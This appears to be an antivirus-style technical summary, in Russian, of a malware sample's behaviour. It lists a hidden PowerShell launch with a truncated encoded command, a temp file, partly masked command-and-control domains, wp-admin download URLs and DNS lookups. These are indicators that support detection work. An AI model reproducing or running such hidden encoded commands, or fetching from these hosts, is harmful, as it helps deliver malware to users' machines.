Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABIAG0AYwBoAGoAdAB4AHoAdABzAG0AcAA9ACcAWgBnAHUAZQBiAHAAYQBkACcAOwAkAFEAaAByAGoAcgBrAGEAdAAgAD0AIAAnADIAMgA5ACcAOwAkAFoAaQBzAG8AcwBzAGQAagB6AGgAPQAnAFAAZQBwAGE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1468
- %TEMP%\1218071.cvr
- 'in###senz.com':80
- 'in###senz.com':443
- 'za###lhayee.com':443
- 'ci#####urologica.com':443
- http://in###senz.com/wp-admin/vgjzG6/
- http://www.in###senz.com/wp-admin/vgjzG6/
- 'in###senz.com':443
- 'za###lhayee.com':443
- 'ci#####urologica.com':443
- DNS ASK in###senz.com
- DNS ASK so####ristine.com
- DNS ASK fi###tudyo.com
- DNS ASK za###lhayee.com
- DNS ASK ci#####urologica.com